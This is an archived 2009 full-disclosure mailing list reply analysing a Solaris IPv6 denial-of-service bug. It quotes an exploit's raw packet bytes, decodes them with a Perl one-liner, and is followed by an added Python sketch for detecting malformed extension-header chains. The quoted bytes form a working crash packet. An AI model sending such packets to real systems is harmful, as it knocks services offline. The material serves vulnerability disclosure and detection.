Message-ID: <20090130134916.GA5945@oshima>
Date: Fri, 30 Jan 2009 14:49:16 +0100
From: GomoR <fd@...or.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Solaris IPv6 DoS vulnerabilities
	(was:	Solaris Devs Are Smoking Pot)

On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer => 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6  trafficClass:0x0f  flowLabel:0xc5729  nextHeader:0x3c
IPv6: payloadLength:0  hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25  dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the 
parsing of the IPv6 Destination Header (0x3c). Of course, there is 
no IPv6 DH to parse :)

Does this vulnerability only exist when setting next header to 0x3c, 
or does it work with other values?

My guess is that we have a more general issue here.

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/               Research Engineer              |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+
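
The mismatch decoded above (nextHeader 0x3c with payloadLength 0) is something a receiver or an IDS rule can test for before touching any extension header. The following Python sketch is an added example, not part of the original message or of Net::Frame; the function names are hypothetical, and it assumes jumbograms are out of scope.

```python
import ipaddress
import struct

# Extension headers that start with (next header, hdr ext len), RFC 8200.
EXT_HEADERS = {0: "Hop-by-Hop", 43: "Routing", 60: "Destination Options"}

# The 40 bytes quoted in the message above: an IPv6 fixed header, nothing else.
PACKET = bytes.fromhex(
    "60fc5729 00003c56 6f354072 702f5258"
    "cc951279 30bbbe25 fe800000 00000000"
    "020c29ff fef11ebb"
)


def parse_fixed_header(pkt):
    if len(pkt) < 40:
        raise ValueError("truncated IPv6 fixed header")
    vtf, plen, nh, hlim = struct.unpack("!IHBB", pkt[:8])
    return {
        "version": vtf >> 28, "traffic_class": (vtf >> 20) & 0xFF,
        "flow_label": vtf & 0xFFFFF, "payload_length": plen,
        "next_header": nh, "hop_limit": hlim,
        "src": str(ipaddress.IPv6Address(pkt[8:24])),
        "dst": str(ipaddress.IPv6Address(pkt[24:40])),
    }


def check_extension_chain(pkt):
    """Return findings; an empty list means the chain fits the payload."""
    hdr = parse_fixed_header(pkt)
    # Trust only bytes covered by payloadLength and the capture (no jumbograms).
    payload = pkt[40:40 + hdr["payload_length"]]
    findings = []
    if len(payload) < hdr["payload_length"]:
        findings.append("capture shorter than declared payloadLength")
    nh, off = hdr["next_header"], 0
    while nh in EXT_HEADERS:
        if off + 2 > len(payload):  # no room for the two mandatory bytes
            findings.append(f"{EXT_HEADERS[nh]} header announced at offset {off}, no bytes left")
            break
        ext_len = (payload[off + 1] + 1) * 8  # 8-octet units, first one not counted
        if off + ext_len > len(payload):
            findings.append(f"{EXT_HEADERS[nh]} header at offset {off} overruns the payload")
            break
        nh, off = payload[off], off + ext_len
    return findings

if __name__ == "__main__":
    print(parse_fixed_header(PACKET), check_extension_chain(PACKET))
```

The loop also covers the other length-prefixed extension headers (Hop-by-Hop, Routing), so the same check applies if the next header value is changed.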
